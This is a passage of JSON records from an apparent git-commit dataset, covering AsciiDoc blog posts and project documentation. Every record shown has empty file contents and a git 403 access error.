iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-13-How-To-Spot-A-Fake-iPhone.adoc","new_file":"_posts\/2016-08-13-How-To-Spot-A-Fake-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e20d25e5241f63d8e66ca934b55624778e6a234","subject":"Update 2017-01-16-Music-for-the-Programming.adoc","message":"Update 2017-01-16-Music-for-the-Programming.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-01-16-Music-for-the-Programming.adoc","new_file":"_posts\/2017-01-16-Music-for-the-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35ece7f7e19ba196e9a753c9c15b62fb2b93ad92","subject":"[DOC] Fix typo in the documentation","message":"[DOC] Fix typo in the documentation\n\nrelates #430\n","repos":"yonglehou\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f84677b7f0a554937491f6d776e1683f726657b7","subject":"Initial proposal on users","message":"Initial proposal on users\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/user-resource.adoc","new_file":"documentation\/design_docs\/design\/user-resource.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b755152595119b245bf48b072b0e6eefe0b0492e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44db253be2ff15b14881b0a12e856a0f852905f2","subject":"Update 2019-01-31-Java-Quiz.adoc","message":"Update 2019-01-31-Java-Quiz.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2019-01-31-Java-Quiz.adoc","new_file":"_posts\/2019-01-31-Java-Quiz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6288614e203801357cff58f8e96afc4b1ab1f4ba","subject":"Update 2016-05-17-Budapest-JS-2016.adoc","message":"Update 2016-05-17-Budapest-JS-2016.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"527b6cff17c518b8e1c862b7fe2f0255e5165b6c","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a45766ee5f3470710ce721e21d96b1438f07a05","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07f373a987fb65b004122ddddc3d4fb3cd8eb5d0","subject":"Update 2019-05-15-Where-is-Prateek.adoc","message":"Update 2019-05-15-Where-is-Prateek.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2019-05-15-Where-is-Prateek.adoc","new_file":"_posts\/2019-05-15-Where-is-Prateek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daf73bb2d9f0fbc4015271ca5b11b9a81bc07ff5","subject":"Update 2016-01-18-Queries-in-Google-Sheets.adoc","message":"Update 2016-01-18-Queries-in-Google-Sheets.adoc","repos":"danen-carlson\/blog,danen-carlson\/blog,danen-carlson\/blog","old_file":"_posts\/2016-01-18-Queries-in-Google-Sheets.adoc","new_file":"_posts\/2016-01-18-Queries-in-Google-Sheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danen-carlson\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78fd63d92e15ee450029b325e45a153cff55ad46","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c90f101e9afd8eba685053288104dd42a2ca7cc","subject":"Fixed typo","message":"Fixed typo\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc24d00fdeadec2bcd3348a4b42576081cbccf82","subject":"Fixes #1211","message":"Fixes #1211\n","repos":"sfat\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aad2f8234eba46636cacdc76d7f5f1f74dc4c3be","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97427e4c22410c6a1397c233c88545e2d2526476","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a86e30c6145555736a67f4ede7c13d19a2e3a9be","subject":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","message":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbe80ea81b319616df4054094afe990a6f32c5ba","subject":"[docs] Add missing krb deps to the SLES12 and Ubuntu instructions","message":"[docs] Add missing krb deps to the SLES12 and Ubuntu instructions\n\nChange-Id: I9f98443a923edb6687427a5863e969883266bd30\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5130\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e78d345f3be65a0d8a5911b295b5cca88946d7ce","subject":"add errata asciidoc file","message":"add errata asciidoc file\n","repos":"psaris\/funq,psaris\/funq","old_file":"errata.adoc","new_file":"errata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psaris\/funq.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ed3f333d3d7d21af0030255a99961bc1818ab8b","subject":"y2b create post You've Never Seen A Mouse Do This...","message":"y2b create post You've Never Seen A Mouse Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-13-YouveNeverSeenAMouseDoThis.adoc","new_file":"_posts\/2017-12-13-YouveNeverSeenAMouseDoThis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdd5c03b0a39d8f21ec0cc2fde32e44ab56c026d","subject":"Additin to NOTES","message":"Additin to NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9941d151373d6895aded0df1cc8396fc82ce0269","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/visual-tools-jul.adoc","new_file":"content\/events\/2022\/visual-tools-jul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5a82fe162970e0aec6c736a1496b0b6f1ab16f05","subject":"Update 2015-11-05-improve-java-dev-environment-with-docker.adoc","message":"Update 2015-11-05-improve-java-dev-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-java-dev-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-java-dev-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af8a14c5c66cbbc6976a4b529c6dd38bf79151d","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e661d9a1d81f5237683316f4daa214f59674b730","subject":"includes starter documentation","message":"includes starter documentation\n","repos":"bd2kccd\/ccd-annotations","old_file":"src\/main\/docs\/api-guide.adoc","new_file":"src\/main\/docs\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bd2kccd\/ccd-annotations.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"eb1d14943efb0df930e8ec1424bfb3234b55532b","subject":"create post The Most RIDICULOUS MacBook Pro","message":"create post The Most RIDICULOUS MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Most-RIDICULOUS-MacBook-Pro.adoc","new_file":"_posts\/2018-02-26-The-Most-RIDICULOUS-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c88f2b41bf59775495c581f3d0f24b79f80741ba","subject":"Added remove headers EIP docs","message":"Added remove headers EIP docs\n","repos":"curso007\/camel,gnodet\/camel,CodeSmell\/camel,objectiser\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,tadayosi\/camel,snurmine\/camel,snurmine\/camel,onders86\/camel,anoordover\/camel,pax95\/camel,snurmine\/camel,tadayosi\/camel,mcollovati\/camel,CodeSmell\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,ullgren\/camel,gautric\/camel,tdiesler\/camel,akhettar\/camel,nikhilvibhav\/camel,anoordover\/camel,adessaigne\/camel,anoordover\/camel,sverkera\/camel,dmvolod\/camel,curso007\/camel,ullgren\/camel,jonmcewen\/camel,mcollovati\/camel,mcollovati\/camel,apache\/camel,christophd\/camel,ullgren\/camel,adessaigne\/camel,punkhorn\/camel-upstream,pax95\/camel,adessaigne\/camel,dmvolod\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,jonmcewen\/camel,CodeSmell\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,snurmine\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,kevinearls\/camel,gnodet\/camel,kevinearls\/camel,gautric\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,cunningt\/camel,pmoerenhout\/camel,jamesnetherton\/camel,gnodet\/camel,sverkera\/camel,davidkarlsen\/camel,davidkarlsen\/camel,Fabryprog\/camel,zregvart\/camel,DariusX\/camel,kevinearls\/camel,pax95\/camel,jamesnetherton\/camel,gnodet\/camel,akhettar\/camel,tadayosi\/camel,jonmcewen\/camel,jonmcewen\/camel,christophd\/camel,curso007\/camel,pmoerenhout\/camel,christophd\/camel,onders86\/camel,jamesnetherton\/camel,gautric\/camel,Fabryprog\/camel,mcollovati\/camel,kevinearls\/camel,tdiesler\/camel,nicolaferraro\/camel,jamesnetherton\/camel,curso007\/camel,jamesnetherton\/camel,pax95\/camel,apache\/camel,davidkarlsen\/camel,sverkera\/camel,DariusX\/camel,apache\/camel,onders86\/camel,zregvart\/camel,anoordover\/camel,onders86\/camel,gautric\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,objectiser\/camel,nicolaferraro\/camel,sverkera\/camel,zregvart\/camel,objectiser\/camel,tdiesler\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,sverkera\/camel,adessaigne\/camel,akhettar\/camel,DariusX\/camel,tadayosi\/camel,curso007\/camel,sverkera\/camel,snurmine\/camel,pax95\/camel,dmvolod\/camel,zregvart\/camel,curso007\/camel,Fabryprog\/camel,objectiser\/camel,akhettar\/camel,anoordover\/camel,dmvolod\/camel,alvinkwekel\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,akhettar\/camel,onders86\/camel,Fabryprog\/camel,DariusX\/camel,dmvolod\/camel,jonmcewen\/camel,gautric\/camel,akhettar\/camel,ullgren\/camel,apache\/camel,gautric\/camel,pmoerenhout\/camel,snurmine\/camel,pmoerenhout\/camel,anoordover\/camel,dmvolod\/camel,tdiesler\/camel,onders86\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,jonmcewen\/camel,nicolaferraro\/camel,gnodet\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeHeaders-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/removeHeaders-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b3a9d291da5433dda337222e7b483602d1a278b3","subject":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","message":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","repos":"hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io","old_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hotfloppy\/hotfloppy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0202e813349cad547dd2fb32a9eb8b334ca8f86","subject":"y2b create post Apple Pencil Drawing Challenge!","message":"y2b create post Apple Pencil Drawing Challenge!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-26-Apple-Pencil-Drawing-Challenge.adoc","new_file":"_posts\/2015-11-26-Apple-Pencil-Drawing-Challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f47df28e5a6b7573a579442e2539c28062340a53","subject":"Remained one awesome bug bad URI","message":"Remained one awesome bug bad URI\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2f5daa5dfbd42dd8cb636c53df79fa337f25cf5","subject":"Added exchangeProperty language to Gitbook","message":"Added exchangeProperty language to Gitbook\n","repos":"ullgren\/camel,DariusX\/camel,w4tson\/camel,prashant2402\/camel,jonmcewen\/camel,JYBESSON\/camel,yuruki\/camel,tdiesler\/camel,christophd\/camel,tkopczynski\/camel,sabre1041\/camel,sverkera\/camel,sirlatrom\/camel,w4tson\/camel,ullgren\/camel,dmvolod\/camel,curso007\/camel,prashant2402\/camel,allancth\/camel,jkorab\/camel,gautric\/camel,isavin\/camel,snurmine\/camel,sabre1041\/camel,onders86\/camel,sabre1041\/camel,davidkarlsen\/camel,apache\/camel,bhaveshdt\/camel,drsquidop\/camel,ullgren\/camel,christophd\/camel,adessaigne\/camel,Thopap\/camel,scranton\/camel,tlehoux\/camel,objectiser\/camel,kevinearls\/camel,curso007\/camel,gilfernandes\/camel,gautric\/camel,veithen\/camel,allancth\/camel,neoramon\/camel,gnodet\/camel,jamesnetherton\/camel,rmarting\/camel,sabre1041\/camel,prashant2402\/camel,akhettar\/camel,ssharma\/camel,anoordover\/camel,Thopap\/camel,gilfernandes\/camel,JYBESSON\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,neoramon\/camel,sverkera\/camel,pax95\/camel,jonmcewen\/camel,allancth\/camel,christophd\/camel,JYBESSON\/camel,pax95\/camel,NickCis\/camel,acartapanis\/camel,jkorab\/camel,pkletsko\/camel,nboukhed\/camel,anoordover\/camel,anoordover\/camel,pax95\/camel,sirlatrom\/camel,anoordover\/camel,curso007\/camel,davidkarlsen\/camel,jonmcewen\/camel,DariusX\/camel,prashant2402\/camel,adessaigne\/camel,akhettar\/camel,bhaveshdt\/camel,chirino\/camel,jarst\/camel,mgyongyosi\/camel,RohanHart\/camel,anton-k11\/camel,drsquidop\/camel,bhaveshdt\/camel,kevinearls\/camel,nboukhed\/camel,tadayosi\/camel,akhettar\/camel,gautric\/camel,cunningt\/camel,Fabryprog\/camel,JYBESSON\/camel,tkopczynski\/camel,bgaudaen\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,prashant2402\/camel,adessaigne\/camel,kevinearls\/camel,tkopczynski\/camel,yuruki\/camel,bgaudaen\/camel,neoramon\/camel,nboukhed\/camel,tkopczynski\/camel,lburgazzoli\/camel,onders86\/camel,veithen\/camel,mcollovati\/camel,Thopap\/camel,jarst\/camel,akhettar\/camel,hqstevenson\/camel,scranton\/camel,jarst\/camel,driseley\/camel,NickCis\/camel,JYBESSON\/camel,cunningt\/camel,tlehoux\/camel,objectiser\/camel,Fabryprog\/camel,curso007\/camel,sirlatrom\/camel,bgaudaen\/camel,ssharma\/camel,gautric\/camel,hqstevenson\/camel,veithen\/camel,adessaigne\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,pmoerenhout\/camel,hqstevenson\/camel,anton-k11\/camel,Fabryprog\/camel,akhettar\/camel,NickCis\/camel,ssharma\/camel,dmvolod\/camel,zregvart\/camel,objectiser\/camel,dmvolod\/camel,jamesnetherton\/camel,driseley\/camel,apache\/camel,drsquidop\/camel,onders86\/camel,anton-k11\/camel,veithen\/camel,w4tson\/camel,CodeSmell\/camel,gnodet\/camel,RohanHart\/camel,gnodet\/camel,prashant2402\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,isavin\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,pax95\/camel,Thopap\/camel,gilfernandes\/camel,jonmcewen\/camel,sverkera\/camel,rmarting\/camel,tlehoux\/camel,mcollovati\/camel,adessaigne\/camel,veithen\/camel,anoordover\/camel,onders86\/camel,mcollovati\/camel,pmoerenhout\/camel,sirlatrom\/camel,gilfernandes\/camel,cunningt\/camel,jkorab\/camel,christophd\/camel,sverkera\/camel,JYBESSON\/camel,pax95\/camel,rmarting\/camel,mgyongyosi\/camel,NickCis\/camel,gnodet\/camel,apache\/camel,gnodet\/camel,nboukhed\/camel,lburgazzoli\/apache-camel,anton-k11\/camel,chirino\/camel,allancth\/camel,tkopczynski\/camel,anton-k11\/camel,drsquidop\/camel,tdiesler\/camel,cunningt\/camel,DariusX\/camel,lburgazzoli\/camel,allancth\/camel,dmvolod\/camel,NickCis\/camel,allancth\/camel,lburgazzoli\/camel,jonmcewen\/camel,ssharma\/camel,onders86\/camel,tdiesler\/camel,objectiser\/camel,chirino\/camel,hqstevenson\/camel,nicolaferraro\/camel,ssharma\/camel,gilfernandes\/camel,chirino\/camel,RohanHart\/camel,pkletsko\/camel,salikjan\/camel,CodeSmell\/camel,jarst\/camel,isavin\/camel,isavin\/camel,chirino\/camel,sabre1041\/camel,isavin\/camel,zregvart\/camel,salikjan\/camel,mgyongyosi\/camel,snurmine\/camel,neoramon\/camel,jonmcewen\/camel,tkopczynski\/camel,alvinkwekel\/camel,gautric\/camel,acartapanis\/camel,lburgazzoli\/camel,tadayosi\/camel,sabre1041\/camel,snurmine\/camel,lburgazzoli\/apache-camel,scranton\/camel,w4tson\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,adessaigne\/camel,jamesnetherton\/camel,nicolaferraro\/camel,sverkera\/camel,christophd\/camel,pkletsko\/camel,curso007\/camel,pkletsko\/camel,cunningt\/camel,CodeSmell\/camel,kevinearls\/camel,alvinkwekel\/camel,yuruki\/camel,tlehoux\/camel,sverkera\/camel,alvinkwekel\/camel,mgyongyosi\/camel,scranton\/camel,tadayosi\/camel,isavin\/camel,davidkarlsen\/camel,Thopap\/camel,c